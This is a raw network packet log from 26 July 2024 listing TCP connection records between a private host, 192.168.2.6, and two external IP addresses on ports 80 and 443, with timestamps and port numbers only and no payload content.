Jul 26, 2024 12:57:33.939527035 CEST	60814	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:34.054018974 CEST	60814	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:34.054274082 CEST	60816	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:34.059469938 CEST	80	60816	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:34.059557915 CEST	60816	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:34.059674025 CEST	60816	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:34.064759970 CEST	80	60816	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:34.069583893 CEST	80	60814	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:34.069642067 CEST	60814	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:34.312479973 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.312566042 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.312613010 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.312710047 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.312710047 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.312710047 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.312750101 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.312819004 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.346317053 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.346364021 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.346515894 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.346515894 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.346533060 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.346584082 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.438920975 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.438986063 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.439047098 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.439080954 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.439096928 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.439138889 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.460376024 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.460474968 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.460527897 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.460613012 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.480845928 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.480890036 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.481064081 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.481089115 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.481152058 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.521935940 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.521994114 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.522159100 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.522159100 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.522193909 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.522253036 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.538054943 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.538105011 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.538141966 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.538168907 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.538196087 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.538213968 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.547548056 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.547590971 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.547749996 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.547760963 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.547805071 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.563647032 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.563700914 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.563750029 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.563772917 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.563800097 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.563827991 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.571985006 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.572026968 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.572082996 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.572082996 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.572103977 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.572160006 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.609843016 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.609885931 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.609966040 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.610016108 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.610048056 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.610075951 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.616826057 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.616868973 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.616913080 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.616940975 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.616971016 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.616990089 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.632453918 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.632519960 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.632571936 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.632596970 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.632622004 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.632647991 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.645551920 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.645592928 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.645648003 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.645675898 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.645706892 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.645735025 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.659004927 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.659045935 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.659111023 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.659125090 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.659153938 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.659173012 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.665553093 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.665596962 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.665637970 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.665653944 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.665685892 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.665716887 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.672509909 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.672550917 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.672590971 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.672610998 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.672635078 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.672655106 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.677681923 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.677735090 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.677763939 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.677781105 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.677807093 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.677828074 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.683461905 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.683502913 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.683545113 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.683557034 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.683588028 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.683604956 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.708323002 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.708378077 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.708542109 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.708563089 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.708635092 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.713563919 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.713615894 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.713654995 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.713669062 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.713696957 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.713716984 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.718168020 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.718214035 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.718255043 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.718281984 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.718308926 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.718329906 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.730310917 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.730355024 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.730411053 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.730422020 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.730438948 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.730458975 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.734924078 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.734976053 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.735002041 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.735011101 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.735040903 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.735059023 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.753391027 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.753432035 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.753465891 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.753477097 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.753493071 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.753515959 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.757757902 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.757817984 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.757853985 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.757868052 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.757894993 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.757903099 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.772991896 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.773041010 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.773130894 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.773139000 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.773173094 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.773196936 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.797342062 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.797467947 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.797478914 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.797522068 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.797529936 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.797569036 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.797811985 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.797841072 CEST	443	60815	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:34.797867060 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.797919989 CEST	60815	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:34.910520077 CEST	80	60816	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:34.910582066 CEST	60816	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:34.912992001 CEST	60816	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:34.917893887 CEST	80	60816	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:35.075398922 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:35.075493097 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:35.075618029 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:35.075917006 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:35.075939894 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:35.163952112 CEST	80	60816	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:35.164041042 CEST	60816	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:35.273113012 CEST	60816	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:35.273679018 CEST	60818	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:35.278835058 CEST	80	60816	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:35.278878927 CEST	80	60818	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:35.278907061 CEST	60816	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:35.278970957 CEST	60818	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:35.279119015 CEST	60818	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:35.284878969 CEST	80	60818	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:35.797137022 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:35.797297001 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:35.798041105 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:35.798069000 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:35.800483942 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:35.800497055 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.023889065 CEST	80	60818	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:36.024235010 CEST	60818	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:36.025043011 CEST	60818	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:36.029896975 CEST	80	60818	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:36.224868059 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.224895000 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.224915028 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.224981070 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.225045919 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.225075960 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.225142002 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.255316973 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.255367041 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.255405903 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.255424976 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.255455971 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.255472898 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.322165966 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.322191000 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.322423935 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.322485924 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.322550058 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.334032059 CEST	80	60818	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:36.334214926 CEST	60818	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:36.352715969 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.352762938 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.352823019 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.352885962 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.352967024 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.352967024 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.408731937 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.408793926 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.409090996 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.409153938 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.409230947 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.434185028 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.434227943 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.434374094 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.434374094 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.434396029 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.434454918 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.444911003 CEST	60818	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:36.445226908 CEST	60819	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:36.453376055 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.453408957 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.453459978 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.453469038 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.453500032 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.453516006 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.466754913 CEST	80	60819	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:36.466846943 CEST	60819	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:36.467056036 CEST	60819	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:36.469052076 CEST	80	60818	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:36.469160080 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.469202042 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.469207048 CEST	60818	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:36.469265938 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.469289064 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.469305038 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.469335079 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.482234955 CEST	80	60819	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:36.483624935 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.483670950 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.483709097 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.483717918 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.483870029 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.483870029 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.494442940 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.494497061 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.494549990 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.494564056 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.494594097 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.494611979 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.502269030 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.502315044 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.502352953 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.502366066 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.502398968 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.502419949 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.515546083 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.515588999 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.515754938 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.515775919 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.515921116 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.527416945 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.527456999 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.527508020 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.527519941 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.527554035 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.527571917 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.536477089 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.536540985 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.536577940 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.536590099 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.536616087 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.536636114 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.548681021 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.548727036 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.548779011 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.548846006 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.548886061 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.548908949 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.553229094 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.553272963 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.553311110 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.553333044 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.553361893 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.553406000 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.553461075 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.553519011 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.553694963 CEST	60817	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.553724051 CEST	443	60817	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.834764957 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.834856033 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:36.834964037 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.835323095 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:36.835361004 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.275916100 CEST	80	60819	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:37.275973082 CEST	60819	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:37.276741982 CEST	60819	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:37.282294989 CEST	80	60819	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:37.483692884 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.483798027 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:37.484334946 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:37.484363079 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.486682892 CEST	60820	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:37.486696959 CEST	443	60820	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:37.533778906 CEST	80	60819	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:37.534022093 CEST	60819	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:37.647768021 CEST	60819	80	192.168.2.6	185.215.113.16
